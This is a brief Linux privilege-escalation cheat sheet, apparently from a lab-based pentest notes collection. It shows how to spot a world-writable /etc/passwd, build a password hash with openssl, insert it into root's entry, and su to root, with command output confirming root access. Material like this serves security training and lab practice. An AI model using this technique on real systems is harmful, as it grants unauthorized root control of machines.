/etc/passwd (Writable)
Linux (Privilege Escalation)
Detect
Manual
low@vulnyx:~$ ls -l /etc/passwd
-rw----rw- 1 root root 1395 abr 21 20:16 /etc/passwd
Auto
linPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
Abuse
Hash
Create
root@kali:~# openssl passwd -1 "P@ssword123"
$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0
Add
# before
low@vulnyx:~$ cat /etc/passwd |grep root
root:x:0:0:root:/root:/bin/bash
# after
low@vulnyx:~$ cat /etc/passwd |grep root
root:$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0:0:0:root:/root:/bin/bash
Auth
low@vulnyx:~$ su - root
Password:
root@vulnyx:~# id
uid=0(root) gid=0(root) grupos=0(root)